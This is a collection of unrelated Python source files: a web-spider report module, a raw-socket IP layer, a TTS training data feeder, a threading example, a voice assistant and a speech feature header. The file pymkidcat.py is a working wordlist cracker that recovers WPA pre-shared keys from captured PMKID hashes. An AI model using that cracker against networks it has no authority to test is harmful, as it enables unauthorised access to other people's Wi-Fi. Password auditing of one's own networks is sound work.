            body = '\n'.join([' -> '.join([i[0], i[1]]) for i in self.redirs])
            report = self._formatreport(amount, header, body, f)
            # Return if just getting string
            if report: return report

    def outreport(self, f=None, b=None, w=200, d=5, t=None):
        '''Pretties up a list of outside URLs referenced under the base URL

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        # Format report if information is available
        if self.outside:
            amount = str(len(self.outside))
            header = '%s links to external URLs under %s on %s:\n'
            body = '\n'.join(self.outside)
            report = self._formatreport(amount, header, body, f)
            # Return if just getting string
            if report: return report

    def othereport(self, f=None, b=None, w=200, d=5, t=None):
        '''Pretties up a list of non-HTTP/FTP URLs

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        # Format report if information is available
        if self.other:
            amount = str(len(self.other))
            header = '%s non-FTP/non-HTTP URLs under %s on %s:\n'
            body = '\n'.join(self.other)
            report = self._formatreport(amount, header, body, f)
            # Return if just getting string
            if report: return report

    def urlreport(self, f=None, b=None, w=200, d=5, t=None):
        '''Pretties up a list of all URLs under a URL

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)'''
        if b: self.weburls(b, w, d, t)
        # Format report if information is available
        if self.urls:
            amount = str(len(self.urls))
            header = '%s verified URLs under %s on %s:\n'
            body = '\n'.join(self.urls)
            report = self._formatreport(amount, header, body, f)
            # Return if just getting string
            if report: return report

    def webreport(self, f=None, b=None, w=200, d=5, t=None, *vargs):
        '''Pretties up a list of logged information under a URL

        Arguments:
        f -- output file for report (default: None)
        b -- base web URL (default: None)
        w -- amount of resources to crawl (default: 200)
        d -- depth in hierarchy to crawl (default: 5)
        t -- number of threads (default: None)
        vargs -- report sections to include or exclude
        To override defaults:
        To include a section add 'badhtm', 'redirs', 'outside', or 'other'
        To exclude a section add 'badurls' or "urls"'''
        if b: self.weburls(b, w, d, t)
        # Defaults for report
        badurls, badhtm, redirs, urls, outside, other = 1, 0, 0, 1, 0, 0
        # Create compilation list
        compile = []
        # Override default report settings if argument is passed to vargs
        for arg in vargs:
            if arg == 'badurls': badurls = 0
            elif arg == 'badhtm': badhtm = 1
            elif arg == 'redirs': redirs = 1
            elif arg == 'urls': urls = 0
            elif arg == 'outside': outside = 1
            elif arg == 'other': other = 1
        # Compile report
        if badurls:
            badurls = self.badurlreport()
            if badurls: compile.append(badurls)
        if urls:
            urls = self.urlreport()
            if urls: compile.append(urls)
        if outside:
            outside = self.outreport()
            if outside: compile.append(outside)
        if redirs:
            redirs = self.redireport()
            if redirs: compile.append(redirs)
        if badhtm:
            badhtm = self.badhtmreport()
            if badhtm: compile.append(badhtm)
        if other:
            other = self.othereport()
            if other: compile.append(other)
        # Make report
        report = '\n\n'.join(compile)
        # Write to file if argument present
        # NOTE(review): this tests the (Python 2) builtin `file`, which is always
        # truthy -- it looks like it should test the `f` argument. As written the
        # string-return branch is unreachable and open(None, 'w') raises when no
        # output file is given. Confirm and fix.
        if file: open(f, 'w').write(report)
        # Or return string
        else: return report

    def _formatreport(self, amount, header, body, file=None):
        '''Generic prettifier with date/time stamper

        Arguments:
        header -- title of report
        body -- body of report
        file -- output file for report (default: None)'''
        # Get current time
        localtime, strftime = self._localtime, self._formtime
        curtime = strftime('%A, %B %d, %Y at %I:%M %p', localtime())
        # Make section header
        header = header % (amount, self.base, curtime)
        # Add header to body
        report = '\n'.join([header, body])
        # Write to file if argument present
        if file: open(file, 'w').write(report)
        # Or return string
        else: return report

    def _mirror(self, lists, root=None, threads=None):
        '''Mirrors a site on a local filesystem based on lists passed to it

        Argument:
        lists -- lists of URLs and paths
        root -- local filesystem path (default: None)
        threads -- number of threads (default: None)'''
        def download(url, np, op):
            '''Downloads files that need to be mirrored.'''
            # If ftp...
            if url[:3] == 'ftp':
                # Open local file
                local = open(np, 'wb')
                # Download using FTP session
                ftp = ftpopen(base, name, password)
                ftp.retrbinary('RETR %s' % op, local.write)
                ftp.close()
                # Close local file
                local.close()
            # Use normal urlretrieve if no FTP required
            else:
                ulib.urlretrieve(url, np)

        def dlthread(url, np, op):
            '''Spawns a thread containing the download function'''
            # Create thread
            dthread = Thread(target=download, args=(url, np, op))
            # Add to thread pool
            pool.append(dthread)

        # Extract path and URL lists
        paths, urls = lists
        # Avoid outside namespace lookups
        ulib, makedirs, sep = self._ulib, self._os.makedirs, self._os.sep
        normcase, split = self._path.normcase, self._path.split
        exists, isdir = self._path.exists, self._path.isdir
        ftpopen = self._ftpopen
        # Create local names for thread class and thread pool
        if threads: Thread, pool = self._thread, []
        # Localize name and password if exists
        try: base, name, password = self.base, self._name, self._password
        except AttributeError: pass
        # Change to directory if given...
        if root:
            if exists(root):
                if isdir(root): self._os.chdir(root)
            # Create root if it doesn't exist
            else:
                makedirs(root)
                self._os.chdir(root)
        # Otherwise use current directory
        else: root = self._os.getcwd()
        # Iterate over paths and download files
        for oldpath in paths:
            # Sync with the URL for oldpath
            url = urls[paths.index(oldpath)]
            # Create name of local copy
            newpath = normcase(oldpath).lstrip(sep)
            # Get directory name
            dirname = split(newpath)[0]
            # If the directory exists, download the file directly
            if exists(dirname):
                if isdir(dirname):
                    if threads: dlthread(url, newpath, oldpath)
                    else: download(url, newpath, oldpath)
            # Don't create local directory if path in root of remote URL
            elif not dirname:
                if threads: dlthread(url, newpath, oldpath)
                else: download(url, newpath, oldpath)
            # Make local directory if it doesn't exist, then dowload file
            else:
                makedirs(dirname)
                if threads: dlthread(url, newpath, oldpath)
                else: download(url, newpath, oldpath)
            # Run threads if they've hit the max number of threads allowed
            if threads:
                # Run if max threads or final thread reached
                if len(pool) == threads or paths[-1] == oldpath:
                    # Start all threads
                    for thread in pool: thread.start()
                    # Clear the thread pool as they finish
                    # NOTE(review): Thread.isAlive() was removed in Python 3.9
                    # (use is_alive()), and removing from `pool` while iterating
                    # it can skip entries -- confirm on the target interpreter.
                    while pool:
                        for thread in pool:
                            if not thread.isAlive(): pool.remove(thread)

# Instance of Spider enables exporting Spider's methods as standalone functions
_inst = Spider()
ftpurls = _inst.ftpurls
weburls = _inst.weburls
ftppaths = _inst.ftppaths
webpaths = _inst.webpaths
ftpmirror = _inst.ftpmirror
ftpspider = _inst.ftpspider
webmirror = _inst.webmirror
webspider = _inst.webspider
webreport = _inst.webreport
urlreport = _inst.urlreport
outreport = _inst.outreport
redireport = _inst.redireport
othereport = _inst.othereport
badurlreport = _inst.badurlreport
badhtmreport = _inst.badhtmreport
IPSocket.py
#! /usr/bin/python3
import threading
import socket
import queue
from IP.IPPacket import IPPacket


class IPSocket:
    """Minimal raw-socket IP layer.

    Sends IPPacket datagrams over a raw socket and, on a background
    listener thread, receives incoming packets, filters them by address
    and checksum, and reassembles fragmented datagrams into complete
    payloads that recv() hands back to the caller.
    """

    LOCAL_HOST_IP = "127.0.0.1"

    def __init__(self, source_address):
        self.is_connected = False
        self.send_socket = None
        self.receive_socket = None
        self.destionation_ip = None
        self.source_ip = source_address
        # Fully reassembled payloads, ready for recv()
        self.complete_packets_queue = queue.Queue()
        # datagram id -> PriorityQueue of (fragment_offset, IPPacket)
        self.partial_packets_buffer = {}
        # Tail of a payload partially consumed by a size-limited recv()
        self.current_packet_unfinished = None
        self.listening_thread = None

    def connect(self, destination):
        '''
        :param destination: destination[0] is destination's link, destination[1] is the socket
        :return: None
        '''
        self.is_connected = True
        try:
            # Receive side is non-blocking so the listener loop can poll.
            self.receive_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
            self.receive_socket.setblocking(False)
            # IPPROTO_RAW: we build the IP header ourselves when sending.
            self.send_socket = socket.socket(type=socket.SOCK_RAW, proto=socket.IPPROTO_RAW)
            self.send_socket.connect(destination)
        except:
            raise Exception("sockets cannot be correctly initiated for connection")
        try:
            self.destionation_ip = socket.gethostbyname(destination[0])
        except:
            raise Exception("the ip address for the link cannot be found")
        try:
            self.thread = threading.Thread(target=self.loop_for_incoming_data)
            self.thread.setDaemon(True)
            self.thread.start()
        except:
            raise Exception("Listening thread cannot be initiated correctly")

    def loop_for_incoming_data(self):
        '''Background loop: receive raw packets, filter and reassemble them.'''
        while 1:
            if not self.is_connected:
                break
            try:
                response = self.receive_socket.recvfrom(IPPacket.PACKET_MAX_SIZE)
            except Exception:
                # Non-blocking socket: nothing to read yet.
                continue
            new_packet = IPPacket.generate_packet_from_received_bytes(response[0])
            if new_packet.destination_ip not in [IPSocket.LOCAL_HOST_IP, self.source_ip] or \
                    new_packet.source_ip != self.destionation_ip:
                print("Drop a packet destined for the wrong address")
                continue
            if new_packet.checksum() != 0:
                # A non-zero checksum over the header means it is corrupt;
                # actually drop the packet instead of parsing it further.
                print("Drop a packet whose checksum does not match header")
                continue
            if new_packet.fragment_offset == 0 and new_packet.flag_more_fragments == 0:
                # Unfragmented datagram: deliver its payload directly.
                self.complete_packets_queue.put(new_packet.data)
            else:
                # Buffer first/middle fragments (MF set) AND the final
                # fragment (MF clear, offset > 0) until the datagram is
                # complete. The original code dropped the final fragment,
                # so reassembly could never finish.
                if new_packet.id not in self.partial_packets_buffer:
                    self.partial_packets_buffer[new_packet.id] = queue.PriorityQueue()
                self.partial_packets_buffer[new_packet.id].put(
                    (new_packet.fragment_offset, new_packet))
                self.assemble_if_complete(new_packet.id)

    def assemble_if_complete(self, id):
        '''Reassemble the datagram `id` if a contiguous, terminated run of
        fragments has been buffered; otherwise leave the buffer untouched.'''
        # Snapshot the buffered (offset, packet) pairs in offset order
        # without consuming the queue (queue.PriorityQueue has no copy();
        # its underlying heap list is exposed as .queue).
        fragments = sorted(self.partial_packets_buffer[id].queue)
        expected_offset = 0
        data = b''
        last_packet = None
        for offset, packet in fragments:
            if offset != expected_offset:
                # Hole in the fragment sequence -> not complete yet.
                return
            # fragment_offset counts 8-octet units (RFC 791); the payload
            # length is total length minus the header (ihl is in 32-bit words).
            expected_offset += (packet.total_length - packet.ihl * 4) // 8
            data += packet.data
            last_packet = packet
        # The datagram is only complete once the fragment with the
        # "more fragments" flag cleared has arrived.
        if last_packet is None or last_packet.flag_more_fragments != 0:
            return
        del self.partial_packets_buffer[id]
        self.complete_packets_queue.put(data)

    def recv(self, max_size=IPPacket.PACKET_MAX_SIZE):
        '''Return up to max_size bytes of the next complete payload, or None
        if nothing is available. Oversized payloads are returned in chunks
        across successive calls.'''
        if self.current_packet_unfinished is None:
            if self.complete_packets_queue.empty():
                return None
            packet = self.complete_packets_queue.get(False)
        else:
            packet = self.current_packet_unfinished
        if len(packet) <= max_size:
            result = packet
            self.current_packet_unfinished = None
        else:
            result = packet[:max_size]
            self.current_packet_unfinished = packet[max_size:]
        return result

    def send(self, data):
        '''Wrap `data` in an IPPacket (with checksum) and send it.'''
        new_packet = IPPacket(self.source_ip, self.destionation_ip, data)
        new_packet.set_checksum_field()
        # print(new_packet.checksum())
        self.send_socket.send(new_packet.convert_packet_to_bytes())
feeder.py
import os
import threading
import time

import numpy as np
import tensorflow as tf
from infolog import log
from sklearn.model_selection import train_test_split

# Number of batches read from disk per background-thread iteration
_batches_per_group = 32

import msgpack
import msgpack_numpy

# Enable (de)serialization of numpy arrays through msgpack
msgpack_numpy.patch()


class Feeder:
    """
    Feeds batches of data into queue on a background thread.
    """

    def __init__(self, coordinator, metadata_filename, hparams):
        super(Feeder, self).__init__()
        self._coord = coordinator
        self._hparams = hparams
        self._train_offset = 0
        self._test_offset = 0

        # Load metadata: each line is "npz_filename|time_steps|mel_frames|text"
        self._out_dir = os.path.dirname(metadata_filename)
        with open(metadata_filename, encoding='utf-8') as f:
            self._metadata = []
            for line in f:
                npz_filename, time_steps, mel_frames, text = line.strip().split('|')
                self._metadata.append(
                    [os.path.join(self._out_dir, os.path.basename(npz_filename)),
                     time_steps, mel_frames, text])
        frame_shift_ms = hparams.hop_size / hparams.sample_rate
        hours = sum([int(x[2]) for x in self._metadata]) * frame_shift_ms / 3600
        log('Loaded metadata for {} examples ({:.2f} hours)'.format(len(self._metadata), hours))

        # Train test split
        if hparams.test_size is None:
            assert hparams.test_batches is not None
        test_size = (hparams.test_size if hparams.test_size is not None
                     else hparams.test_batches * hparams.batch_size)
        indices = np.arange(len(self._metadata))
        train_indices, test_indices = train_test_split(
            indices, test_size=test_size, random_state=hparams.data_random_state)
        # Make sure test_indices is a multiple of batch_size else round down
        # (the surplus test examples are pushed back into the training split)
        len_test_indices = self._round_down(len(test_indices), hparams.batch_size)
        extra_test = test_indices[len_test_indices:]
        test_indices = test_indices[:len_test_indices]
        train_indices = np.concatenate([train_indices, extra_test])
        self._train_meta = list(np.array(self._metadata)[train_indices])
        self._test_meta = list(np.array(self._metadata)[test_indices])
        self.test_steps = len(self._test_meta) // hparams.batch_size
        if hparams.test_size is None:
            assert hparams.test_batches == self.test_steps
        # pad input sequences with the <pad_token> 0 ( _ )
        self._pad = 0
        # explicitely setting the padding to a value that doesn't originally exist in the spectogram
        # to avoid any possible conflicts, without affecting the output range of the model too much
        if hparams.symmetric_mels:
            self._target_pad = -hparams.max_abs_value
        else:
            self._target_pad = 0.
        # Mark finished sequences with 1s
        self._token_pad = 1.
        with tf.device('/cpu:0'):
            # Create placeholders for inputs and targets. Don't specify batch size because we want
            # to be able to feed different batch sizes at eval time.
            self._placeholders = [
                tf.placeholder(tf.int32, shape=(None, None), name='inputs'),
                tf.placeholder(tf.int32, shape=(None,), name='input_lengths'),
                tf.placeholder(tf.float32, shape=(None, None, hparams.num_mels), name='mel_targets'),
                tf.placeholder(tf.float32, shape=(None, None), name='token_targets'),
                tf.placeholder(tf.float32, shape=(None, None, hparams.num_freq), name='linear_targets'),
                tf.placeholder(tf.int32, shape=(None,), name='targets_lengths'),
            ]
            # Create queue for buffering data
            queue = tf.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32],
                                 name='input_queue')
            self._enqueue_op = queue.enqueue(self._placeholders)
            self.inputs, self.input_lengths, self.mel_targets, self.token_targets, self.linear_targets, self.targets_lengths = queue.dequeue()
            # dequeue() loses static shape info; restore it from the placeholders
            self.inputs.set_shape(self._placeholders[0].shape)
            self.input_lengths.set_shape(self._placeholders[1].shape)
            self.mel_targets.set_shape(self._placeholders[2].shape)
            self.token_targets.set_shape(self._placeholders[3].shape)
            self.linear_targets.set_shape(self._placeholders[4].shape)
            self.targets_lengths.set_shape(self._placeholders[5].shape)
            # Create eval queue for buffering eval data
            eval_queue = tf.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32],
                                      name='eval_queue')
            self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
            self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, self.eval_token_targets, \
                self.eval_linear_targets, self.eval_targets_lengths = eval_queue.dequeue()
            self.eval_inputs.set_shape(self._placeholders[0].shape)
            self.eval_input_lengths.set_shape(self._placeholders[1].shape)
            self.eval_mel_targets.set_shape(self._placeholders[2].shape)
            self.eval_token_targets.set_shape(self._placeholders[3].shape)
            self.eval_linear_targets.set_shape(self._placeholders[4].shape)
            self.eval_targets_lengths.set_shape(self._placeholders[5].shape)

    def start_threads(self, session):
        # Launch the daemonized train/eval feeding threads against `session`.
        self._session = session
        thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
        thread.daemon = True  # Thread will close when parent quits
        thread.start()

        thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
        thread.daemon = True  # Thread will close when parent quits
        thread.start()

    @staticmethod
    def loads_msgpack(path):
        """Load one msgpack-serialized example from disk.

        Args:
            :param path: the output of `dumps`.
        """
        with open(path, 'rb') as f:
            bin_data = f.read()
        return msgpack.loads(bin_data, raw=False)

    def _get_test_groups(self):
        # Read the next test example (sequentially) from disk.
        npz_filename, time_steps, mel_frames, text = self._test_meta[self._test_offset]
        self._test_offset += 1
        npz_data = self.loads_msgpack(npz_filename)
        input_data = npz_data['input_data']
        mel_target = npz_data['mel']
        linear_target = npz_data['linear']
        target_length = npz_data['mel_frames']
        token_target = npz_data['stop_token']
        return input_data, mel_target, token_target, linear_target, target_length

    def make_test_batches(self):
        # Build the (fixed) list of evaluation batches from the whole test set.
        start = time.time()

        # Read a group of examples
        n = self._hparams.batch_size
        r = self._hparams.outputs_per_step

        # Test on entire test set
        examples = [self._get_test_groups() for _ in range(len(self._test_meta))]

        # Bucket examples based on similar output sequence length for efficiency
        examples.sort(key=lambda x: x[-1])
        batches = [examples[i: i + n] for i in range(0, len(examples), n)]
        np.random.shuffle(batches)

        log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
        return batches, r

    def _enqueue_next_train_group(self):
        # Background loop: read groups of examples, batch them, feed the queue.
        while not self._coord.should_stop():
            start = time.time()

            # Read a group of examples
            n = self._hparams.batch_size
            r = self._hparams.outputs_per_step
            examples = [self._get_next_example() for _ in range(n * _batches_per_group)]

            # Bucket examples based on similar output sequence length for efficiency
            examples.sort(key=lambda x: x[-1])
            batches = [examples[i: i + n] for i in range(0, len(examples), n)]
            np.random.shuffle(batches)

            log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
            for batch in batches:
                feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
                self._session.run(self._enqueue_op, feed_dict=feed_dict)

    def _enqueue_next_test_group(self):
        # Create test batches once and evaluate on them for all test steps
        test_batches, r = self.make_test_batches()
        while not self._coord.should_stop():
            for batch in test_batches:
                feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
                self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)

    def _get_next_example(self):
        """Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
        """
        # Reshuffle the training metadata each time an epoch completes.
        if self._train_offset >= len(self._train_meta):
            self._train_offset = 0
            np.random.shuffle(self._train_meta)
        npz_filename, time_steps, mel_frames, text = self._train_meta[self._train_offset]
        self._train_offset += 1
        npz_data = self.loads_msgpack(npz_filename)
        input_data = npz_data['input_data']
        mel_target = npz_data['mel']
        linear_target = npz_data['linear']
        target_length = npz_data['mel_frames']
        token_target = npz_data['stop_token']
        return input_data, mel_target, token_target, linear_target, target_length

    def _prepare_batch(self, batches, outputs_per_step):
        # Pad every example of the batch to a common length and stack them.
        # NOTE: shuffles `batches` (the list of examples) in place.
        np.random.shuffle(batches)
        targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32)  # Used to mask loss
        input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)
        # The *_max_len values are currently unused but kept for clarity.
        inputs, input_max_len = self._prepare_inputs([x[0] for x in batches])
        mel_targets, mel_target_max_len = self._prepare_targets([x[1] for x in batches], outputs_per_step)
        token_targets, token_target_max_len = self._prepare_token_targets([x[2] for x in batches], outputs_per_step)
        linear_targets, linear_target_max_len = self._prepare_targets([x[3] for x in batches], outputs_per_step)
        return inputs, input_lengths, mel_targets, token_targets, linear_targets, targets_lengths

    def _prepare_inputs(self, inputs):
        # Pad all 1-D input sequences to the batch maximum length.
        max_len = max([len(x) for x in inputs])
        return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len

    def _prepare_targets(self, targets, alignment):
        # Pad 2-D targets to the batch maximum, rounded up to `alignment` frames.
        max_len = max([len(t) for t in targets])
        data_len = self._round_up(max_len, alignment)
        return np.stack([self._pad_target(t, data_len) for t in targets]), data_len

    def _prepare_token_targets(self, targets, alignment):
        # Pad 1-D stop-token targets to the batch maximum, rounded up to `alignment`.
        max_len = max([len(t) for t in targets])
        data_len = self._round_up(max_len, alignment)
        return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len

    def _pad_input(self, x, length):
        return np.pad(x, (0, length - x.shape[0]), mode='constant', constant_values=self._pad)

    def _pad_target(self, t, length):
        return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode='constant', constant_values=self._target_pad)

    def _pad_token_target(self, t, length):
        return np.pad(t, (0, length - t.shape[0]), mode='constant', constant_values=self._token_pad)

    @staticmethod
    def _round_up(x, multiple):
        # Smallest multiple of `multiple` that is >= x.
        remainder = x % multiple
        return x if remainder == 0 else x + multiple - remainder

    @staticmethod
    def _round_down(x, multiple):
        # Largest multiple of `multiple` that is <= x.
        remainder = x % multiple
        return x if remainder == 0 else x - remainder
example3.py
import threading def writer(): global text while True: with service: resource.acquire() print(f"Writing being done by {threading.current_thread().name}.") text += f"Writing was done by {threading.current_thread().name}. " resource.release() def reader(): global rcount while True: with service: rcounter.acquire() rcount += 1 if rcount == 1: resource.acquire() rcounter.release() print(f"Reading being done by {threading.current_thread().name}:") # print(text) with rcounter: rcount -= 1 if rcount == 0: resource.release() text = "This is some text. " rcount = 0 rcounter = threading.Lock() resource = threading.Lock() service = threading.Lock() threads = [threading.Thread(target=reader) for i in range(3)] + [ threading.Thread(target=writer) for i in range(2) ] for thread in threads: thread.start()
pymkidcat.py
#!/usr/bin/env python
# NOTE(review): this is Python 2 code -- it relies on `xrange`, on str-based
# HMAC construction (`chr`, `str.translate` with a 256-char table) and on
# `str.decode('hex')`, none of which exist in Python 3. Run under Python 2.
import sys
from hashlib import pbkdf2_hmac, sha1
import argparse
import datetime
import multiprocessing
import os

# Wall-clock start used for the "time elapsed" report
start = datetime.datetime.now()


def to_brute(sem):
    # Worker process: brute-force the (module-global) pmkid/essid/msg triple
    # against the wordlist. `sem` bounds the number of concurrent workers.
    sem.acquire()
    with open(wordlist) as w:
        for line in w:
            line = line.strip()
            # WPA passphrases are at least 8 characters long
            if (len(line) <= 7):
                continue
            # pbkdf2_gen
            pmk = (pbkdf2_hmac(hash_name='sha1', password=line, salt=essid, iterations=4096, dklen=32))
            # hmac-sha1_gen end compare
            # Hand-rolled HMAC-SHA1: build the ipad/opad translation tables.
            trans_5C = "".join(chr(x ^ 0x5c) for x in xrange(256))
            trans_36 = "".join(chr(x ^ 0x36) for x in xrange(256))
            blocksize = sha1().block_size
            pmk += chr(0) * (blocksize - len(pmk))
            o_key_pad = pmk.translate(trans_5C)
            i_key_pad = pmk.translate(trans_36)
            # compare hmac-sha1 with PMKID, if match show result end kill child process.
            if (sha1(o_key_pad + sha1(i_key_pad + msg).digest()).hexdigest()[:32]) == pmkid:
                end = datetime.datetime.now()
                elapsed = end - start
                print("[!] AP: %s Cracked!!!\n\t\tPSK...: %s \n\t\tTime elapsed...: %s \n" % (essid, line, str(elapsed)[:-3]))
                sem.release()
                sys.exit()
    print( "[!] Ap " + essid + " exhausted")
    sem.release()


parser = argparse.ArgumentParser()
parser.add_argument('-z', action='store', dest='hash_file', help='hcxpcaptool -z file')
parser.add_argument('-w', action='store', dest='wordlist_file', help='wordlist file')
results = parser.parse_args()
hash_file = results.hash_file
wordlist = results.wordlist_file
if hash_file is None or wordlist is None:
    parser.print_help()
    sys.exit()

if __name__ == '__main__':
    print("running...\n")
    # NOTE(review): `wf` is only opened to check readability; it is never
    # read from and never closed.
    try:
        wf = open(wordlist, 'r')
    except IOError:
        print("[!] I cannot load this file: " + wordlist)
        sys.exit()
    if hash_file is not None:
        try:
            to_crack = [line.strip() for line in open(hash_file)]
        except IOError:
            print("[!] I cannot load this file: " + hash_file)
            sys.exit()
    # Drop empty lines
    to_crack = filter(None, to_crack)
    # Creates processes for each hash
    maxconnections = multiprocessing.cpu_count()  # number of spawning to_bute() function, based on your processor cores
    sem = multiprocessing.BoundedSemaphore(value=maxconnections)
    for hashes in to_crack:
        # Hash lines are "PMKID*MAC_AP*MAC_CLIENT*ESSID(hex)"
        hcl = hashes.strip().split('*')
        pmkid = (hcl[0])
        macAp = (hcl[1])
        macCli = (hcl[2])
        essid = (hcl[3]).decode('hex')
        msg = ("504d4b204e616d65" + macAp + macCli).decode("hex")  # Atom's magic numbers :)
        # The worker reads pmkid/essid/msg from the module globals set above.
        mp = multiprocessing.Process(target=to_brute, args=(sem,))
        mp.start()
main.py
# 🚩 Dada Ki Jay Ho 🚩
# Voice-assistant entry point: listens for the Esc key, records a spoken
# command, and dispatches it to the matching handler in run_cmd().
# Global Things ----------------------------------------
import speech_recognition as sr
import webbrowser as wb
import threading
import pyautogui
import datetime
import socket
import os

from Resources.Work_By_Raj.Opening_Applications import Opening_Applications
from Resources.Work_By_Raj.AutoSave import auto_save
from Resources.Work_By_Raj.Google_Calender_api.Resources import Return_events_info
from Resources.UsedForBoth import text_to_speech
from Resources.Work_By_Shaishav.Send_Email import Send_Achinya_started_email
from Resources.Work_By_Shaishav.Fetch_text_from_image import fetch_text_image
from Resources.Work_By_Shaishav import OpenFolder

# Speech-recognizer tuning (thresholds chosen empirically)
recognizer = sr.Recognizer()
microphone = sr.Microphone()
recognizer.energy_threshold = 668
recognizer.pause_threshold = .6
recognizer.operation_timeout = 11
# -------------------------------------------------------


def welcome():
    # Greeting routine (currently not called from the main flow).
    text_to_speech.sayAndWait("Welcome Sir!")
    text_to_speech.sayAndWait("I am Your Virtual Assistant")
    # Return_events_info.say_event_details("how many events do I have today")


def run_cmd(cmd: str):
    # Dispatch a recognized voice command to its handler. Matching is by
    # substring, so several branches may fire for one command.
    cmd = cmd.lower()
    if "search" in cmd:
        thing_to_search = cmd[len("search "):]
        wb.open("https://www.google.com/search?q=" + thing_to_search)
    if "open " in cmd and "drive" not in cmd and "folder" not in cmd:
        try:
            Opening_Applications.open_applications(cmd)
        except Exception as e:
            text_to_speech.sayAndWait(e)
    if "open" in cmd and ("drive" in cmd or "folder" in cmd):
        OpenFolder.open_folder(cmd)
    if ("start" in cmd or "turn on" in cmd) and ("auto save" in cmd or "autosave" in cmd or "automatic save" in cmd):
        auto_save.is_auto_save_on = True
        thread = threading.Thread(target=auto_save.show_auto_save_window)
        thread.start()
        # auto_save.auto_save(cmd)
    if "upcoming" in cmd and "event" in cmd:
        text_to_speech.sayAndWait("Just wait Please")
        thread = threading.Thread(target=Return_events_info.say_event_details,
                                  args=("how many events do i have today",))
        thread.start()
    if "turn off computer" in cmd or "switch off" in cmd:
        os.system("shutdown /s /t 1")
    if 'fetch text from an image' in cmd or 'fetch text from image' in cmd or "get text from an image" in cmd or "get text from image" in cmd \
            or 'text from image' in cmd or 'text from an image' in cmd:
        thread = threading.Thread(target=fetch_text_image.fetch_text_from_image)
        thread.start()
    if "take a screen shot" in cmd or "take screen shot" in cmd or "take a screenshot" in cmd or "take screenshot" in cmd:
        import getpass
        username = getpass.getuser().strip()
        # Timestamped filename; ':' is not allowed in Windows filenames.
        pyautogui.screenshot(f"C://users//{username}//Desktop//{str(datetime.datetime.now()).replace(':','-')}.jpg")


from pynput import keyboard
from plyer import notification


def on_press(i):
    # Keyboard hook: Esc starts one listen/recognize/dispatch cycle.
    # print(i)
    # print(dir(i))
    # print(str(type(i)) == "<enum 'Key'>")
    if str(type(i)) == "<enum 'Key'>" and i.name == "esc":
        with microphone as mic:
            print("You can speak now, we are listening in background")
            print("🚩 " * 36)
            notification.notify("Listening ...", "You can speak now ...", timeout=1, toast=True)
            try:
                audio = recognizer.listen(mic, phrase_time_limit=5, timeout=4)
                text = recognizer.recognize_google(audio)
                print("CMD: " + text)
                notification.notify("Command: ", text, timeout=2.2)
                # Handle the command off-thread so the key listener stays responsive.
                thread = threading.Thread(target=run_cmd, args=(text,))
                thread.start()
            except sr.WaitTimeoutError as e:
                print(e)
            except sr.UnknownValueError as e:
                print("*" * 50)
                print("can not recognize")
                print(e)
                print("*" * 50)
            except sr.RequestError as e:
                text_to_speech.sayAndWait("Problem in Internet Connection")
            except socket.timeout as e:
                text_to_speech.sayAndWait("Slow Internet Connection")
                print(e)
            except Exception as e:
                print(e)
        notification.notify("Free 🆓", "Waiting ...", timeout=1, toast=True)


# Startup: greet, announce via email (off-thread), then block on the key listener.
text_to_speech.sayAndWait("Hello Sir! I am Your Virtual Assistant")
thread = threading.Thread(target=Send_Achinya_started_email.send_stated_email)
thread.start()

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()
feature.py
# coding=utf-8 # # Yu Wang (University of Yamanashi) # Apr, 2021 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import math import pyaudio import wave import time import webrtcvad import threading import multiprocessing import numpy as np import subprocess from collections import namedtuple from exkaldirt.base import ExKaldiRTBase, Component, PIPE, Packet, ContextManager from exkaldirt.utils import run_exkaldi_shell_command, encode_vector_temp from exkaldirt.base import info, mark, print_ from exkaldirt.base import Endpoint, is_endpoint, NullPIPE # from base import ExKaldiRTBase, Component, PIPE, Packet, ContextManager # from utils import run_exkaldi_shell_command, encode_vector_temp # from base import info, mark, print_ # from base import Endpoint, is_endpoint, NullPIPE if info.CMDROOT is None: raise Exception("ExKaldi-RT C++ library have not been compiled sucessfully. " + \ "Please consult the Installation in github: https://github.com/wangyu09/exkaldi-rt .") import sys sys.path.append( info.CMDROOT ) import cutils ############################################### # 1. Some functions for feature extraction ############################################### def pre_emphasize_1d(waveform,coeff=0.95): ''' Pre-emphasize the waveform. Args: _waveform_: (1-d np.ndarray) The waveform data. _coeff_: (float) Coefficient. 0 <= coeff < 1.0. Return: A new 1-d np.ndarray. 
